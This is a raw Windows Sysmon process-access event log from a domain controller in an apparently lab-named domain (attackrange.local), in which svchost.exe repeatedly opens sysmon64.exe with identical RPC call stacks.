12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 